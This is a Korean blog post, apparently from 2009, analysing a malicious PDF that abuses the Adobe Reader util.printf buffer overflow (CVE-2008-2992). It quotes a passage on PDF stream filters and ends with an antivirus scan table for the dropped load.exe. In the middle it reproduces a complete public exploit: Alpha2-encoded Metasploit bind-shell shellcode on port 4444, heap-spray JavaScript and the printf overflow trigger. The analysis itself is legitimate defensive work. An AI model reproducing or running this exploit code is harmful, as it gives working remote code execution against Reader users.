[PDF 취약점] Adobe Reader Javascript Printf Buffer Overflow Exploit

샘플이 손에 들어와서 한번 분석을 해보까 했는데, 첨부터 짜증이;;
암튼 하나씩 풀어봐야겠다.

파일을 까보면, 대충 이런 형식으로 되어있다.

자세한 PDF Stram Object에 대해서는 링크로 대체하니, 참고 할 분들은 참고 하시길
http://blog.didierstevens.com/2008/05/19/pdf-stream-objects/

A PDF stream object is a sequence of bytes. There is a virtually unlimited number of ways to represent the same byte sequence. After Names and Strings obfuscation, let’s take a look at streams.

A PDF stream object is composed of a dictionary (<< >>), the keyword stream, a sequence of bytes and the keyword endstream. All streams must be indirect objects. Here is an example:

This stream is indirect object 5 version 0. The stream dictionary must have a /Length entry, to document the length of the (encoded) byte sequence. The stream and endstream keywords are terminated with the EOL character(s). In this example, the byte sequence is a set of instructions for the PDF reader to render the string Hello World with a given font at a precise position. It’s precisely 42 bytes long.

In this example, the byte sequence is represented literally, but it’s possible (and usual) to encode the byte sequence. This is done with a stream filter. A stream filter specifies how the sequence of bytes has to be decoded. Let’s take the same example, but with an ASCII85 encoding:

The /Filter entry instructs the PDF reader how to decode the byte sequence (/ASCII85Decode). Notice the change of the length value. There are many encoding schemes (ASCII filters and decompression filters), here is a list:

• ASCIIHexDecode
• ASCII85Decode
• LZWDecode
• FlateDecode
• RunLengthDecode
• CCITTFaxDecode
• JBIG2Decode
• DCTDecode
• JPXDecode
• Crypt

This list is not so long, so why do I claim an almost limitless number of ways to encode a stream? I have 2 reasons:

1. Many filters, like /FlateDecode, take parameters (in this case, the compression level), which influence the encoding too
2. Filters can be cascaded, meaning that the stream has to be decoded by more than one filter

Here is our example, where the stream is encoded twice, first with ASCII85 and then with plain HEX (I know, this is rather pointless, but it yields simple and readable examples):

Cascading filters also inspired me to create a couple of test PDF documents. For example, I’ve created a 2642 bytes small PDF document that contains a 1GB large stream (a ZIP bomb of sorts). Some PDF readers will choke on this document.

실제 pdf 동작시 이 스크립트가 실행하기 위해서는 너무 많은 시간이 걸릴 것 같아서 패스~
중요한건 파일을 다운로드 하는 주소를 알아오는 것에 목적을 두자 ㅋ

자 위의 내용들을 디코딩 하면 다음과 같은 USCII 스트링으로 변환할 수 있다.
빨간박스 내용은 실제 동작시킬 스크립트이며, 파란박스의 내용은 Printf를 이용하여 오버플로우를 발생 시키는 코드이다.

Printf 오버플로우에 대한 Expoit코드는 다음 링크를 참조하시길...
http://www.milw0rm.com/exploits/7006

Adobe Reader Javascript Printf Buffer Overflow Exploit
===========================================================
Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
CVE-2008-2992
Thanks to coresecurity for the technical background.
6Nov,2008: Exploit released by me
Credits: Debasis Mohanty
www.hackingspirits.com
www.coffeeandsecurity.com
===========================================================
//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
//www.coffeeandsecurity
//www.hackingspirits.com
// win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.comvar payload = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949
%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850
%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164
%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550
%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877
%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474
%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c
%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c
%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346
%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b
%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230
%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633
%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50
%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947
%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164
%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130
%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337
%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d
%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b
%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679
%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174
%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350
");//Heap Spray starts here - Kiddos don't mess up with this
var nop ="";
for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + payload;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize+heapblock.length
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;// reference snippet from core security
// http://www.coresecurity.com/content/adobe-reader-buffer-overflow
var num = 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888
8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888
util.printf("%45000f",num);

# milw0rm.com [2008-11-05]

USCII 스트링을 HEX값으로 변환 시, 다음 주소를 얻을 수 있다.
(주소를 수정하지 않으니, 다운로드 하는 분들은 주의하시기 바람 ㅋㅋ 아직 먼지 모름 ㅋㅋ)

다음 주소는 load.exe를 다운로드 시키는 것을 확인 하였다.

아직 파일에 대한 분석은 되지 않았으며, 탐지하는 백신이 그리 많지 않다.

File load.exe received on 03.11.2009 02:04:12 (CET)
Antivirus	Version	Last Update	Result
a-squared	4.0.0.101	2009.03.10	-
AhnLab-V3	5.0.0.2	2009.03.10	-
AntiVir	7.9.0.107	2009.03.10	-
Authentium	5.1.0.4	2009.03.10	-
Avast	4.8.1335.0	2009.03.10	-
AVG	8.0.0.237	2009.03.10	-
BitDefender	7.2	2009.03.11	-
CAT-QuickHeal	10.00	2009.03.10	(Suspicious) - DNAScan
ClamAV	0.94.1	2009.03.11	-
Comodo	1046	2009.03.10	-
DrWeb	4.44.0.09170	2009.03.11	-
eSafe	7.0.17.0	2009.03.09	-
eTrust-Vet	31.6.6388	2009.03.09	-
F-Prot	4.4.4.56	2009.03.10	-
F-Secure	8.0.14470.0	2009.03.10	-
Fortinet	3.117.0.0	2009.03.10	-
GData	19	2009.03.11	-
Ikarus	T3.1.1.45.0	2009.03.10	-
K7AntiVirus	7.10.665	2009.03.10	-
Kaspersky	7.0.0.125	2009.03.11	Trojan.Win32.Agent2.ezl
McAfee	5549	2009.03.10	-
McAfee+Artemis	5549	2009.03.10	-
Microsoft	1.4405	2009.03.10	VirTool:Win32/Obfuscator.ES
NOD32	3925	2009.03.11	-
Norman	6.00.06	2009.03.10	-
nProtect	2009.1.8.0	2009.03.10	-
Panda	10.0.0.10	2009.03.10	-
PCTools	4.4.2.0	2009.03.10	-
Prevx1	V2	2009.03.11	-
Rising	21.20.11.00	2009.03.10	-
SecureWeb-Gateway	6.7.6	2009.03.10	-
Sophos	4.39.0	2009.03.10	-
Sunbelt	3.2.1858.2	2009.03.10	-
Symantec	1.4.4.12	2009.03.11	-
TheHacker	6.3.3.0.278	2009.03.11	-
TrendMicro	8.700.0.1004	2009.03.10	-
VBA32	3.12.10.1	2009.03.11	-
ViRobot	2009.3.10.1643	2009.03.10	-
VirusBuster	4.5.11.0	2009.03.10	-
Additional information
File size: 29184 bytes
MD5...: a647e2ad9a87554c634c2174d388eb3b